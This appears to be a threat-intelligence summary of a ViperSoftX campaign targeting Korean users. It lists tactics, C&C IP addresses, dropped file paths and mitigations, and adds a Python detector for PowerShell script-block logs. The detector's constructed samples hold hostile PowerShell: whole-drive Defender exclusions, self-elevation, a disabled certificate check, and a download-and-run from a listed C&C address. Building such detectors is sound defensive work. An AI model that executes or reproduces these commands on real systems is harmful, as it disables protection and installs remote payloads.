Full Report
AhnLab SEcurity intelligence Center (ASEC) uncovered that attackers, suspected to be Arabic speakers, have been distributing ViperSoftX malware targeting Korean victims since April 1, 2025. ViperSoftX is typically spread through cracked software or torrents, masquerading as legitimate programs. The main characteristic of ViperSoftX is that it operates as a PowerShell script. During the C&C communication […]
Analysis Summary
# Threat Actor: Arabic-Speaking Threat Actor (Distributing ViperSoftX)
## Attribution & Identity
The actor is suspected to be Arabic-speaking, a conclusion drawn from the presence of Arabic comments within the PowerShell and VBS code used for Command and Control (C&C) communication. No specific threat group name is attributed, only the linguistic signature identified by ASEC.
## Activity Summary
The threat actor has been actively distributing **ViperSoftX** malware, targeting **Korean victims** since at least April 1, 2025. The initial distribution vector for ViperSoftX in this campaign is currently unclear, but the malware is generally spread via cracked software or torrents, masquerading as legitimate programs. The execution chain involves ViperSoftX dropping a VBS downloader, which subsequently executes a PowerShell script to fetch and deploy secondary malware, including PureCrypter and Quasar RAT.
## Tactics, Techniques & Procedures
- **Initial Access:** Distribution via cracked software or torrents (though source unclear in this specific campaign).
- **Execution:** Execution chain relying on a PowerShell script (ViperSoftX), VBScript downloader (`vbs.vbs`), and a PowerShell downloader (`a.ps1`).
- **Persistence/Defense Evasion:** The PowerShell downloader adds **Windows Defender exclusion paths** for the whole C: and D: drives, so any payload dropped anywhere on those volumes is skipped by Defender scanning.
- **Privilege Escalation:** The PowerShell downloader checks for administrator privileges and re-executes itself with elevated rights if necessary.
- **Command and Control (C2):** C&C communication uses the URI paths `/api/`, `/api/v1`, `/api/v2`, and `/api/v3/`. The secondary malware (PureCrypter) serializes its C&C messages with the **protobuf library**.
- **Payload Delivery:** The actor downloads and executes additional malware, including a downloader/loader (PureCrypter) and a Remote Access Trojan (Quasar RAT). No lateral movement activity is described in the report.
- **Language Markers:** **Arabic comments** in the scripts are the only basis for the attribution; they suggest, but do not prove, the developer's origin.
- **Protocol Usage:** C&C traffic is wrapped in **TLS 1.2** with server certificate validation disabled on the client side, so the actor's servers need no valid certificate and the traffic cannot be inspected on the wire without TLS interception.
## Targeting
- **Sectors:** Not specified; the crack/torrent lure points to opportunistic rather than sector-specific targeting.
- **Geography:** South Korea (Korean victims).
- **Victims:** No organizations are named; victims are individual users in South Korea who ran the trojanized software.
## Tools & Infrastructure
- **Malware Families Used:**
- **ViperSoftX:** The core initial payload, operating as a PowerShell script.
- **VBS Downloader (`vbs.vbs`):** Used to launch the next stage scripts.
- **PowerShell Downloader (`a.ps1`):** Responsible for privilege escalation, defense evasion, and downloading the final payloads.
- **PureCrypter:** Used as a downloader, noteworthy for using Protobuf for C&C serialization.
- **Quasar RAT:** An open-source .NET RAT used for remote control.
- **Infrastructure (C2 Addresses):**
- `89.117.79[.]31`:56005, `89.117.79[.]31`:56004, `89.117.79[.]31`:56003
- `65.109.29[.]234`:7702, `65.109.29[.]234`
- `136.243.132[.]112` (Identified IOC)
- **Dropped File Paths (Examples):**
- `%ALLUSERSPROFILE%\nvidia.exe`, `%ALLUSERSPROFILE%\teamviewer.exe`, `%ALLUSERSPROFILE%\temp.exe`, `%ALLUSERSPROFILE%\words.exe` (Associated with PureCrypter)
- `%ALLUSERSPROFILE%\winrar.exe`, `%ALLUSERSPROFILE%\micro.exe` (Associated with Quasar RAT)
- Creates folder: `C:\ProgramData\SystemLoader`
## Implications
This activity indicates a persistent threat actor, possibly using commercial tools (PureCrypter) combined with publicly available tools (Quasar RAT), targeting the South Korean victim base. The multi-stage infection chain, reliance on PowerShell, and specific C&C URI structures suggest a degree of sophistication aimed at achieving persistent remote access, likely for espionage or data exfiltration given the capabilities of Quasar RAT. Continuous monitoring is necessary as additional, unidentified malware may be deployed.
## Mitigations
- Users should strictly **avoid downloading software from torrent sites or using cracked programs**. Employ only legitimate software sources.
- Ensure **antivirus/endpoint detection solutions are updated** to the latest versions.
- Monitor for PowerShell execution that escalates privileges or bypasses security controls, in particular Windows Defender exclusion changes that cover whole drives (on Windows these are made with `Add-MpPreference -ExclusionPath` or the matching registry keys) and scripts that relaunch themselves elevated. PowerShell Script Block Logging (Event ID 4104) records the script content needed for this.
- Implement detection rules for the identified C&C URI patterns (`/api/`, `/api/v1`, `/api/v2`, `/api/v3/`) at the proxy or TLS-terminating gateway. Because the traffic is TLS-wrapped with client-side certificate validation disabled, the protobuf payloads of PureCrypter are not visible on the wire without interception, so endpoint telemetry is the more reliable detection point.
- Restrict administrative rights for standard users.
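The following Python script is an added example, not code from the ASEC report or from the malware itself. It triages constructed PowerShell Script Block Logging (Event ID 4104) entries for the behaviours listed under Tactics, Techniques & Procedures and called out in the Mitigations: Defender exclusions on drive roots, self-elevation, disabling server certificate validation, `/api/vN` C&C URIs, executables dropped under `%ALLUSERSPROFILE%`, and contact with the listed C&C IPs. The sample events, rule names and weights are assumptions made for illustration; the exact syntax of the real `a.ps1` is not given on the page.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample 4104 script blocks (made up for this example, not captured
# from the campaign). Events 1-3 mimic the behaviours the report describes;
# event 4 is benign administrative activity that must not be flagged.
SAMPLE_EVENTS = [
    {"id": 1, "script": "\n".join([
        "Add-MpPreference -ExclusionPath 'C:\\'",
        "Add-MpPreference -ExclusionPath 'D:\\'",
    ])},
    {"id": 2, "script": "\n".join([
        "$id = [Security.Principal.WindowsIdentity]::GetCurrent()",
        "$p = New-Object Security.Principal.WindowsPrincipal($id)",
        "if (-not $p.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {",
        "  Start-Process powershell.exe -Verb RunAs -ArgumentList ('-File ' + $MyInvocation.MyCommand.Path)",
        "  exit",
        "}",
    ])},
    {"id": 3, "script": "\n".join([
        "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12",
        "[Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }",
        "$wc = New-Object Net.WebClient",
        "$wc.DownloadFile('https://89.117.79.31:56005/api/v2', 'C:\\ProgramData\\nvidia.exe')",
        "Start-Process 'C:\\ProgramData\\nvidia.exe'",
    ])},
    {"id": 4, "script": "\n".join([
        "Get-ChildItem C:\\Users | Select-Object Name",
        "Get-MpPreference | Select-Object ExclusionPath",
    ])},
]

# (name, weight, pattern). Weights are arbitrary assumptions for ranking.
RULES = [
    # Exclusion of a bare drive root such as C:\ or D:\ (not a subfolder).
    ("defender_exclusion_drive_root", 3,
     re.compile(r"Add-MpPreference\s+-ExclusionPath\s+['\"]?[A-Za-z]:\\?(?=['\"\s]|$)", re.I | re.M)),
    # Admin check followed by a relaunch with -Verb RunAs.
    ("self_elevation", 2,
     re.compile(r"IsInRole\([^)]*Administrator\)[\s\S]*?Start-Process[^\n]*-Verb\s+RunAs", re.I)),
    # Certificate validation callback forced to $true.
    ("tls_cert_validation_bypass", 2,
     re.compile(r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I)),
    # URLs ending in /api/, /api/v1, /api/v2 or /api/v3/ as listed in the report.
    ("c2_api_uri", 2,
     re.compile(r"https?://[^\s'\"]+/api(?:/v[123])?/?(?=['\"\s]|$)", re.I)),
    # Executables written directly under %ALLUSERSPROFILE% / C:\ProgramData.
    ("programdata_drop", 1,
     re.compile(r"(?:%ALLUSERSPROFILE%|C:\\ProgramData)\\[^\s'\"]+\.exe", re.I)),
]

# C&C addresses from the report, re-fanged here so they match raw script text.
KNOWN_C2_IPS = {"89.117.79.31", "65.109.29.234", "136.243.132.112"}
IP_RX = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


@dataclass
class Finding:
    event_id: int
    hits: list[str]
    score: int
    c2_ips: list[str]


def scan_script_block(event: dict) -> Finding:
    """Apply every rule to one 4104 script block and return the matched rule names."""
    script = event["script"]
    hits = [name for name, _w, rx in RULES if rx.search(script)]
    score = sum(w for name, w, _rx in RULES if name in hits)
    ips = sorted(set(IP_RX.findall(script)) & KNOWN_C2_IPS)
    if ips:  # a known C&C address is a strong indicator on its own
        hits.append("known_c2_ip")
        score += 4
    return Finding(event["id"], hits, score, ips)


def triage(events: list[dict], min_score: int = 2) -> list[Finding]:
    """Return findings at or above min_score, highest score first."""
    findings = [scan_script_block(e) for e in events]
    return sorted((f for f in findings if f.score >= min_score), key=lambda f: -f.score)


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"event {f.event_id}: score={f.score} hits={f.hits} c2_ips={f.c2_ips}")
```

In practice the `SAMPLE_EVENTS` list would be replaced by 4104 events exported with `Get-WinEvent` and parsed into `{"id", "script"}` dictionaries; the rule set deliberately keys on behaviours (whole-drive exclusions, self-elevation, disabled certificate checks) rather than on file names, because the dropped file names in this campaign (`nvidia.exe`, `teamviewer.exe`, ...) are trivially changed.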